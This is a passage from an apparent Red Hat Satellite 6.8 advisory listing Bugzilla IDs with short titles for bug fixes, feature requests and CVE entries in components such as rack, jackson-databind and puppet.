Upgrade Fails with error \"rake aborted! NoMethodError: undefined method `first\u0027 for nil:NilClass\" when there are custom bookmarks created\n1563270 - Sync status information is lost after cleaning up old tasks related to sync. \n1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers (\u0027ECDHE-RSA-AES128-GCM-SHA256\u0027, \u0027ECDHE-RSA-AES256-GCM-SHA384\u0027)\n1571907 - Passenger threads throwing tracebacks on API jobs after spawning\n1576859 - [RFE] Implement automatic assigning subnets through data provided by facter\n1584184 - [RFE] The locked template is getting overridden by default\n1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box\n1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template\n1608001 - Rearrange search/filter options on Red Hat Repositories page. \n1613391 - race condition on removing multiple organizations simultaneously\n1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot\n1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version\n1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui\n1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization\n1625258 - Having empty \"Allocation (GB)\" when creating a new Host, nil:NilClass returned on creating the Host\n1627066 - Unable to revert to the original version of the provisioning template\n1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules\n1630536 - yum repos password stored as cleartext\n1632577 - Audit log show \u0027missing\u0027 for adding/removing repository to a CV\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1645062 - host_collection controller responds with 200 instead of 201 to a POST request\n1645749 - repositories controller responds with 200 instead of 201 to a POST request\n1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build\n1647364 - [RFE] Extend the audits by the http request id\n1647781 - Audits contain no data (Added foo to Missing(ID: x))\n1651297 - Very slow query when using facts on user roles as filters\n1653217 - [RFE] More evocative name for Play Ansible Roles option?\n1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks\n1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,\n1659418 - katello-tracer-upload failing with error \"ImportError: No module named katello\"\n1665277 - subscription manager register activation key with special character failed\n1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal\n1666693 - Command \"hammer subscription list\" is not correctly showing the comment \"Guests of \" in the \"Type\" field in the output. \n1677907 - Ansible API endpoints return 404\n1680157 - [RFE] Puppet \u0027package\u0027 provider type does not support selecting modularity streams\n1680458 - Locked Report Templates are getting removed. \n1680567 - Reporting Engine API to list report template per organization/location returns 404 error\n1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite\n1685949 - [RFE] Support passing of attribute name instead of Id\u0027s in RHV workflow\n1687116 - kernel version checks should not use /lib/modules to determine running version\n1688886 - subscription-manager not attaching the right quantity per the cpu core\n1691416 - Delays when many clients upload tracer data simultaneously\n1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself\n1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don\u0027t match runtime permissions\n1705097 - An empty report file doesn\u0027t show any headers\n1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service\n1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed\n1710511 - Filter by os_minor includes unexpected values on the Satellite web UI. \n1715999 - Use Infoblox API for DNS conflict check and not system resolver\n1716423 - Nonexistent quota can be set\n1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page\n1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array\n1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally\n1719509 - [RFE] \"hammer host list\" including erratas information\n1719516 - [RFE] \"hammer host-collection hosts\" including erratas information\n1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition\n1721419 - SSH key cannot be added when FIPS enabled\n1722954 - Slow performance when running \"hammer host list\" with a high number of Content Hosts (15k+ for example)\n1723313 - foreman_tasks:cleanup description contain inconsistent information\n1724494 - [Capsule][smart_proxy_dynflow_core] \"PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start\"\n1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name\n1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear\n1730083 - [RFE] Add Jobs button to host detail page\n1731155 - Cloud init template missing snippet compared to Kickstart default user data\n1731229 - podman search against Red Hat Satellite 6 fails. \n1731235 - [RFE] Create Report Template to list inactive hosts\n1733241 - [RFE] hammer does not inherit parent location information\n1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN\n1736809 - undefined method `split\u0027 for nil:NilClass when viewing the host info with hammer\n1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host. \n1737564 - [RFE] Support custom images on Azure\n1738548 - Parameter --openscap-proxy-id is missing in hammer host create command. \n1740943 - Increasing Ansible verbosity level does not increase the verbosity of output\n1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location. \n1743776 - Error while deleting the content view version. \n1745516 - Multiple duplicate index entries are present in candlepin database\n1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI. \n1749692 - Default Rhel8 scap content does not get populated on the Satellite\n1749916 - [RFE] Satellite should support certificates with \u003e 2048 Key size\n1751981 - Parent object properties are not propagated to Child objects in Location and Host Group\n1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command\n1753551 - Traces output from Satellite GUI has mismatches with client tracer output\n1756991 - 2 inputs with same name -\u003e uninitialized constant #\u003cClass:0x000000000b894c38\u003e::NonUniqueInputsError\n1757317 - [RFE] Dynflow workers extraction\n1757394 - [BUG] Non-admin users always get \"Missing one of the required permissions\" message while accessing their own table_preferences via Satellite 6 API\n1759160 - Rake task for cleaning up DHCP records on proxy\n1761872 - Disabled buttons are still working\n1763178 - [RFE] Unnecessary call to userhelp and therefore log entries\n1763816 - [RFE] Report which users access the API\n1766613 - Fact search bar broken and resets to only searching hostname\n1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting\n1767497 - Compute Resource filter does not correctly allow Refresh Cache\n1767635 - [RFE] Enable Organization and Location to be entered not just selected\n1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer. \n1770544 - Puppet run job notification do not populate \"%{puppet_options}\"\u0027 value\n1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method `[]\u0027 for nil:NilClass\n1771367 - undefined method `request_uri\u0027 when Openidc Provider Token Endpoint is none\n1771428 - Openscap documentation link on Satellite 6 webui is broke\n1771484 - Client side documentation links are not branded\n1771693 - \u0027Deployed on\u0027 parameter is not listed in API output\n1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order\n1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again\n1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt\n1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare\n1774710 - UI: When selecting the server type in ldap authentication, \"attribute mappings\" fields could be populated automatically\n1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)\n1778503 - Prepended text on OS name creation\n1778681 - Some pages are missing title in html head\n1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI. \n1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly\n1782352 - [RHEL 8.1 client] All packages are not getting updated after click on \"Update All Packages\"\n1782426 - Viewing errata from a repository returns incorrect unfiltered results\n1783568 - [RFE] - Bulk Tracer Remediation\n1783882 - Ldap refresh failed with \"Validation failed: Adding would cause a cycle!\"\n1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log\n1784341 - disable CertificateRevocationListTask job in candlepin.conf by default\n1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file\n1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6. \n1785624 - [UI] Importing templates with associate \u0027never\u0027 is not resulting as expected\n1785683 - Does not load datacenter when multiple compute resources are created for same VCenter\n1785902 - Ansible RunHostJob tasks failed with \"Failed to initialize: NoMethodError - undefined method `[]\u0027 for nil:NilClass\"\n1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date\n1787329 - change filename in initrd live CPIO archive to fdi.iso\n1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL\n1788958 - [RFE] add \"elapsed time\" column to export and hammer, make it filterable in WebUI\n1789006 - Smart proxy dynflow core listens on 0.0.0.0\n1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id\n1789434 - Template editor not always allows refreshing of the preview pane\n1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely\n1789686 - Non-admin user with enough permissions can\u0027t generate report of applicable errata\n1789815 - The \"start\" parameter should be mentioned inside \"--compute-attributes:\" in hammer_cli for Satellite 6\n1789911 - \"foreman-rake katello:publish_unpublished_repositories\" is referring to column which no longer exists in katello_repositories table. \n1789924 - [RFE] As user I want to see a \"disabled\" status for Simple Content Access (Golden Ticketed) Orgs\n1791654 - drop config_templates api endpoints and parameters\n1791656 - drop deprecated host status endpoint\n1791658 - drop reports api endpoint\n1791659 - Remove `use_puppet_default` api params\n1791663 - remove deprecated permissions api parameters\n1791665 - drop deprecated compute resource uuid parameter\n1792131 - [UI] Could not specify organization/location for users that come from keycloak\n1792135 - Not able to login again if session expired from keycloak\n1792174 - [RFE] Subscription report template\n1792304 - When generating custom report, leave output format field empty\n1792378 - [RFE] Long role names are cut off in the roles UI\n1793951 - [RFE] Display request UUID on audits page\n1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists\n1794346 - Change the label for the flashing eye icon during user impersonation\n1794641 - Sync status page\u0027s content are not being displayed properly. \n1795809 - HTML tags visible on paused task page\n1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled\n1796205 - iso upload: correctly check if upload directory exists\n1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling\n1796259 - loading subscriptions page is very slow\n1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode\n1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout\n1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server\n1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state. \n1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host\n1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input\n1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input\n1802529 - Repository sync in tasks page shows percentage in 17 decimal points\n1802631 - Importing Ansible variables yields NoMethodError: undefined method `map\u0027 for nil:NilClass (initialize_variables) [variables_importer.rb]\n1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none\n1804496 - While performing bulk actions, unable to select all tasks under Monitor --\u003e Tasks page. \n1804651 - Missing information about \"Create Capsule\" via webUI\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7\n1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error\n1806842 - Disabling dynflow_enable_console from setting should hide \"Dynflow console\" in Tasks\n1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method `mtu\u0027\n1807042 - [RFE] Support additional disks for VM on Azure Compute Resource\n1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics. \n1807829 - Generated inventory file doesn\u0027t exist\n1807946 - Multiple duplicate index entries are present in foreman database\n1808843 - Satellite lists unrelated RHV storage domains using v4 API\n1810250 - Unable to delete repository - Content with ID could not be found\n1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd\n1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection\n1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic \"errata\" page instead\n1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units\n1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana\u0027s API specification\n1812904 - \u0027Hypervisors\u0027 task fails with \u0027undefined method `[]\u0027 for nil:NilClass\u0027 error\n1813005 - Prevent --tuning option to be applied in Capsule servers\n1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)\n1814095 - Applicable errata not showing up for module stream errata\n1815104 - Locked provisioning template should not be allowed to add audit comment\n1815135 - hammer does not support description for custom repositories\n1815146 - Backslash escapes when downloading a JSON-formatted report multiple times\n1815608 - Content Hosts has Access to Content View from Different Organization\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1816699 - Satellite Receptor Installer role can miss accounts under certain conditions\n1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval\n1816853 - Report generated by Red Hat Inventory Uploads is empty. \n1817215 - Admin must be able to provide all the client ids involved inside Satellite settings. \n1817224 - Loading one org\u0027s content view when switching to a different org\n1817481 - Plugin does not set page \u003ctitle\u003e\n1817728 - Default task polling is too frequent at scale\n1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com. \n1818062 - Deprecated message about katello agent being shown on content host registration page\n1818816 - Web console should open in a new tab/window\n1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1820193 - Deleted Global Http Proxy is still being used during repository sync. \n1820245 - reports in JSON format can\u0027t handle unicode characters\n1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512\n1821335 - Inventory plugin captures information for systems with any entitlement\n1821457 - [RFE] Capsules shouldn\u0027t update hosts\u0027 \"Registered through\" facts on the Satellite server in a load-balanced configuration. \n1821629 - Eager zero seems to do nothing\n1821651 - Manifest import task progress remains at 0. \n1821752 - New version of the plugin is available: 1.0.5\n1822039 - Get HTTP error when deploying the virt-who configure plugin\n1822560 - Unable to sync large openshift docker repos\n1823905 - Update distributor version to sat-6.7\n1823991 - [RFE] Add a more performant way to sort reports\n1824183 - Virtual host get counted as physical hosts on cloud.redhat.com\n1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes \"Blank\"\n1825760 - schedule inventory plugin sync failed due to \u0027organization_id\u0027 typecasting issue. \n1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy\n1825978 - Manifest refresh failed with \u0027Katello::Errors::CandlepinError Invalid credentials.\u0027 error\n1826298 - even when I cancel ReX job, remediation still shows it as running\n1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images\n1826515 - [RFE] Consume Candlepin events via STOMP\n1826625 - Improve performance of externalNodes\n1826678 - New version of the plugin is available: 2.0.6\n1826734 - Tasks uses wrong controller name for bookmarks\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories\n1827583 - Installing dhcp_isc and dhcp_remote_isc fails with \"You cannot specify the same gem twice with different version requirements.....You specified: rsec (\u003c 1) and rsec (\u003e= 0)\"\n1828257 - Receptor init file missing [Install] section, receptor service won\u0027t run after restart\n1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API\n1828549 - Manifest Certificate Exposed by Unprivileged User\n1828682 - Create compute resource shows console error \u0027Cannot read property \u0027aDataSort\u0027 of undefined\u0027\n1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default\n1828868 - Add keep alive option in Receptor node\n1829487 - Ansible verbosity level does not work\n1829766 - undefined method `tr\u0027 for nil:NilClass when trying to get a new DHCP lease from infoblox\n1830253 - Default job templates are not locked\n1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time\n1830834 - Unable to update default value of a smart class parameter (Sql query error). \n1830860 - Refactor loading regions based on subscription dynamically\n1830882 - Red Hat Satellite brand icon is missing\n1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo\n1831528 - CVE-2020-5267 rubygem-actionview: views that use the `j` or `escape_javascript` methods are susceptible to XSS attacks\n1833031 - Improve RH account ID fetching in cloud connector playbook\n1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)\n1833039 - Introduce error code to playbook_run_finished response type\n1833311 - \"Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid\" while creating scap policy with ansible deployment option. \n1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of \u0027/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud\u0027 returned 1: Error: Nothing to do\n1834377 - Disable mongo FTDC\n1834866 - Missing macro for \"registered_at\" host subscription facet\n1834898 - Login Page background got centralized and cropped\n1835189 - Missing macro for \"host_redhat_subscriptions\" in host subscription facet\n1835241 - Some applicability of the consumers are not recalculated after syncing a repository\n1835882 - While executing \"Configure Cloud Connector\" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting\n1836155 - Support follow on rails, travis and i18n work for AzureRm plugin\n1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman. \n1836774 - Some foreman services failed to start (pulp_streamer)\n1836845 - \"Generate at\" in report template should be current date\n1837951 - \"invalid Unicode Property \\p: /\\b\\perform various actions through those proxies\\b(?!-)/\" warning messages appears in dynflow-sidekiq@worker-hosts-queue\n1838160 - \u0027Registered hosts\u0027 report does not list kernel release for rhsm clients\n1838191 - Arrow position is on left rather in the middle under \"Start Time\"\n1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory\n1838917 - Repositories are not showing their available Release versions due to a low default db pool size\n1838963 - Hypervisors from Satellite, never makes their way to HBI\n1838965 - Product name link is not working on the activation keys \"Repository Sets\" tab. \n1839025 - Configure Cloud Connector relies on information which is no longer provided by the API\n1839649 - satellite-installer --reset returns a traceback\n1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds\n1839779 - undefined local variable or method `implicit_order_column\u0027 for #\u003cActiveRecord::Associations::CollectionProxy\u003e on GET request to /discovery_rules endpoint\n1839966 - New version of the plugin is available: 2.0.7\n1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out . \n1840191 - Validate parameters passed by receptor to the receptor-satellite plugin\n1840218 - ArgumentError: wrong number of arguments\n1840525 - Content host list doesn\u0027t update after the successful deletion of content host. \n1840635 - Proxy has failed to load one or more features (Realm)\n1840723 - Selected scenario is DISABLED, can not continue\n1840745 - Satellite installation failed with puppet error \" No Puppet module parser is installed\"\n1841098 - Failed to resolve package dependency while doing satellite upgrade. \n1841143 - Known hosts key removal may fail hard, preventing host from being provisioned\n1841573 - Clicking breadcrumb \"Auth Source Ldaps\" on Create LDAP Auth Source results in \"The page you were looking for doesn\u0027t exist.\"\n1841818 - icons missing on /pub download page\n1842900 - ERROR! the role \u0027satellite-receptor\u0027 was not found in ... \n1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/\n1843406 - In 6.8, Receptor installation playbook\u0027s inputs are visible again\n1843561 - Report templates duplicated\n1843846 - Host - Registered Content Hosts report: \"Safemode doesn\u0027t allow to access \u0027report_hraders\u0027 on #\u003cSafemode::ScopeObject\u003e\"\n1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8\n1843926 - satellite-change-hostname fails when running nsupdate\n1844142 - [RFE] Drop a subsription-manager fact with the satellite version\n1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP\n1845486 - [RFE] Able to select \u0027HTTP Proxy\u0027 during Compute Resource create for \u0027GCE\u0027 as similar to EC2\n1845860 - hammer org add-provisioning-template command returns Error: undefined method `[]\u0027 for nil:NilClass\n1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser\n1846254 - need to restart services after enabling leapp plugin\n1846313 - Add index on locks for resource type and task id\n1846317 - undefined method `klass\u0027 for nil:NilClass\n1846421 - build pxe default do not work when more than 1 provider\n1846593 - Satellite-installer failed with error \"Could not find a suitable provider for foreman_smartproxy\" while doing upgrade from 6.7 to 6.8\n1847019 - Empty applicability for non-modular repos\n1847063 - Slow manifest import and/or refresh\n1847407 - load_pools macro not in list of macros\n1847645 - Allow override of Katello\u0027s DISTRIBUTOR_VERSION\n1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details. \n1847840 - Libvirt note link leads to 404\n1847871 - Combined Profile Update: ArgumentError: invalid argument: nil. \n1848291 - Download kernel/initram for kexec asynchronously\n1848535 - Unable to create a pure IPv6 host\n1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)\n1848902 - ERF42-0258 [Foreman::Exception]: \u003cuuid\u003e is not valid, enter id or name\n1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory\n1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool\n1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms\n1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule\n1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names\n1849656 - ERROR! You cannot use loops on \u0027import_tasks\u0027 statements. You should use \u0027include_tasks\u0027 instead. \n1849680 - Task progress decimal precision discrepancy between UI, CLI, and API\n1849869 - Unable to recycle the dynflow executor\n1850355 - Auth Source Role Filters are not working in Satellite 6.8\n1850536 - Can\u0027t add RHEV with APIv3 through Hammer\n1850914 - Checksum type \"sha256\" is not available for all units in the repository. Make sure those units have been downloaded\n1850934 - Satellite-installer failed with error \"Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)\"\n1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates\n1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9\n1851167 - Autoattach -\u003e \"undefined\" subscription added\n1851176 - Subscriptions do not provide any repository sets\n1851952 - \"candlepin_events FAIL Not running\" and wont restart\n1852371 - Allow http proxy ports by default\n1852723 - Broken link for documentation on installation media page\n1852733 - Inventory upload documentation redirects to default location\n1852735 - New version of the plugin is available: 2.0.8\n1853076 - large capsule syncs cause slow processing of dynflow tasks/steps\n1853200 - foreman-rake-db:migrate Fails on \"No indexes found on foreman_tasks_locks with the options provided\"\n1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7\n1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh\n1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views\n1853572 - Broken documentation link for \u0027RHV\u0027 in Compute Resource\n1854138 - System purpose status should show as \u0027disabled\u0027 when Satellite is in Simple Content Access mode. \n1854397 - Compliance reports are not being uploaded to satellite. \n1854530 - PG::NotNullViolation when syncing hosts from cloud\n1855008 - Host parameters are set after the host is created. \n1855254 - Links to documentation broken in HTTP Proxies setup\n1855348 - katello_applicability accidentally set to true at install\n1855710 - \u0027Ensure RPM repository is configured and enabled\u0027 task says \u0027FIXME\u0027\n1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page. \n1856379 - Add missing VM creation tests\n1856401 - [RFE] Add module to create HTTP Proxy\n1856831 - New version of the plugin is available: 2.0.9\n1856837 - undefined method \u0027#httpboot\u0027 for NilClass::Jail (NilClass) when creating an IPv6 only host\n1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500\n1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos\n1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos\n1857377 - Capsule Upgrade Playbook fails with \"Failed to initialize: NoMethodError - undefined method `default_capsule\u0027 for Katello:Module\"\n1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError\n1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename. \n1857726 - Warnings are shown during the satellite package installation on RHEL 7.9\n1858237 - Upgraded Satellite has duplicated katello_pools indexes\n1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user\n1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite\n1858855 - Creating compute resources on IPV6 network does not fail gracefully\n1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf\n1859194 - load_hosts macro duplicated in a list of macros\n1859276 - Need to update the deprecation warning message on Statistics and Trends page. \n1859705 - Tomcat is not running on fresh Capsule installation\n1859929 - User can perform other manifest actions while the first one starts\n1860351 - \u0027Host - compare content hosts packages\u0027 report fails with error \u0027undefined method \u0027#first\u0027 for NilClass\u0027\n1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed\n1860422 - Host with remediations can\u0027t be removed\n1860430 - \u0027Host - compare content hosts packages\u0027 report: Safemode doesn\u0027t allow to access \u0027version\u0027... \n1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service\n1860519 - Browsing capsule /pub directory with https fails with forbidden don\u0027t have permission to access /pub/ error. \n1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8\n1860587 - Documentation link in Administer -\u003e About pointing to 6.6 document. \n1860835 - Installed Packages not displayed on About page\n1860957 - Unable to select an organization for sync management\n1861367 - Import Template sync never completes\n1861397 - UI dialog for Capsule Upgrade Playbook job doesn\u0027t state whitelist_options is required\n1861422 - Error encountered while handling the response, replying with an error message (\u0027plugin_config\u0027)\n1861656 - smart-proxy-openscap-send command fails to upload reports to satellite. \n1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request\n1861766 - Add ability to list traces by host with hammer\n1861807 - Cancel/Abort button should be disabled once REX job is finish\n1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer\n1861831 - satellite-change-hostname cannot change the satellite hostname after failing. \n1861890 - Recommended repos do not match Satellite version\n1861970 - Content -\u003e Product doesn\u0027t work when no organization is selected\n1862135 - updating hosts policy using bulk action fails with sql error\n1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite. \n1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6\n1865871 - Obfuscated hosts do not have domain reported\n1865872 - Templates doc - examples on onepage.html are not processed\n1865874 - Add inventory status to host\n1865876 - Make recommendations count in hosts index a link\n1865879 - Add automatic scheduler for insights sync\n1865880 - Add an explanation how to enable insights sync\n1865928 - Templates documentation help page has hard-coded Satellite setting value\n1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently\n1866029 - Templates DSL documentation: Parts of description are put in \u003cpre\u003e tag\n1866436 - host search filter does not work in job invocation page\n1866461 - Run action is missing in job templates page\n1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page\n1866700 - Hammer CLI is missing \"resolve\" (traces) option for katello-tracer\n1866710 - Wrong API endpoint path referenced for resolving host traces\n1867239 - hammer content-view version incremental-update fails with ISE\n1867287 - Error Row was updated or deleted by another transaction when deleting docker repository\n1867311 - Upgrade fails when checkpoint_segments postgres parameter configured\n1867399 - Receptor-satellite isn\u0027t able to deal with jobs where all the hosts are unknown to satellite\n1867895 - API Create vmware ComputeResource fails with \"Datacenter can\u0027t be blank\"\n1868183 - Unable to change virt-who hypervisor location. \n1868971 - Receptor installation job doesn\u0027t properly escape data it puts into receptor.conf\n1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)\u0027 messages come in upgrade and installation. \n1869812 - Tasks fail to complete under load\n1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow\n1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)\n1871434 - theme css \".container\" class rule is too generic\n1871729 - ansible-runner implementation depends on third party repository for ansible-runner package. \n1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout\n1871978 - Bug in provisioning_template Module\n1872014 - Enable web console on host error in \"Oops, we\u0027re sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console\"\n1872041 - Host search returns incorrect result\n1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result\n1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover\n1874143 - Red Hat Inventory Uploads does not use proxy\n1874160 - Changing Content View of a Content Host needs to better inform the user around client needs\n1874168 - Sync Plan fails with \u0027uninitialized constant Actions::Foreman::Exception\u0027\n1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file\n1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)\n1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow\n1874176 - Unable to search by value of certain Hostgroup parameter\n1874422 - Hits Sync uses only old proxy setting\n1874619 - Hostgroup tag is never reported in slice\n1875357 - After upgrade server response check failed for candlepin. \n1875426 - Azure VM provision fails with error 